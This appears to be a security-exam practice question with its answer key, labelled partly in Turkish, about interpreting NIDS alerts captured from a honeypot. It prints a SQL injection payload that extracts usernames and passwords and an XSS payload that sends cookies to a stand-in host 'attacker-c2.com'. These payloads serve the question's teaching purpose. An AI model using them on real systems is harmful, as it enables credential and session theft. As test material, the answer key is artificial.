A network security monitoring (NSM) sensor captures telemetry from an isolated subnet containing an intentional decoy server. The Network Intrusion Detection System (NIDS) generates alerts containing the following captured HTTP GET request payloads:
Payload 1: GET /search.php?id=100' UNION SELECT username, password FROM users--
Payload 2: GET /profile.php?name=<script>document.location='http://attacker-c2.com/collect?c='+document.cookie</script>
Which of the following statements correctly interpret this network telemetry and security control architecture? (Select TWO.)
- The captured telemetry demonstrates both database manipulation via SQL injection and client-side code execution via Cross-Site Scripting (XSS).Cevap
- The targeted decoy server serves as a detective deception control (honeypot) designed to capture threat intelligence rather than prevent inline traffic.Cevap
- CThe monitoring sensor operates as an inline Network Intrusion Prevention System (NIPS) that automatically drops malicious TCP packets before host delivery.
- DApplying ingress network Access Control Lists (ACLs) on border routers is the primary remediation strategy to patch these application vulnerabilities.
Cevap
The captured telemetry demonstrates both SQL injection and Cross-Site Scripting (XSS) targeting a detective honeypot deception control.
The correct options correctly identify the two payload signatures (SQL injection via database UNION syntax and XSS via script tags) and accurately classify the decoy system on an isolated network as a honeypot used for detective security monitoring.
Adım Adım Çözüm
Anahtar Kavram
Network Security Monitoring and Alert Interpretation